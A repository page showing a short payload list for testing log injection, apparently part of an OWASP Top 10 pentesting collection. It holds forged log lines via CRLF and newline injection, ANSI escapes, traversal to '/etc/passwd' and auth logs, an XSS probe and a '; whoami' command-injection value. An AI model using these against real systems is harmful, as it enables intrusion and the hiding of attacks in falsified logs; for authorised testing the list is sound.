0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 11:35:51 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
ab9c127df32a398f09c7f27c314cd772d2f34d8e
hunting/OWASP-Top-10/A09-Security-Logging-Monitoring-Failures/log-injection-payloads.txt
T
copilot-swe-agent[bot] ab9c127df3 Add comprehensive OWASP Top 10 directory structure with injection payloads 
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
2026-01-04 18:24:32 +00:00

51 lines
1.1 KiB
Plaintext
Raw Blame History

# Log Injection Payloads
# CRLF injection in logs
\r\n
\r\nUser: admin logged in successfully
%0d%0a
%0d%0aAuthentication successful for admin
# Log poisoning
\nuser=admin authenticated=true\n
\r\nSUCCESS: Admin login\r\n
%0auser:admin%0astatus:success%0a
# Log format manipulation
admin\nAuthenticated:true
test\r\nRole:administrator
# Time-based log injection
[2023-01-01 00:00:00] User admin logged in successfully
[CRITICAL] Unauthorized access detected
# Null byte injection in logs
admin\x00
user\x00admin
# ANSI escape sequences (log injection)
\x1b[31mCRITICAL\x1b[0m
\033[1;31mALERT\033[0m
# Log file path traversal
../../logs/application.log
/var/log/auth.log
../../../var/log/syslog
# Events that should be logged (test if they're logged)
- Failed login attempts
- Successful login
- Password changes
- Privilege escalation
- Administrative actions
- Access to sensitive data
- Invalid input
- Authentication failures
- Authorization failures
# Events to check in logs
SELECT * FROM users WHERE username='admin' AND password='wrong'
<script>alert('XSS')</script>
../../../etc/passwd
; whoami
Reference in New Issue View Git Blame Copy Permalink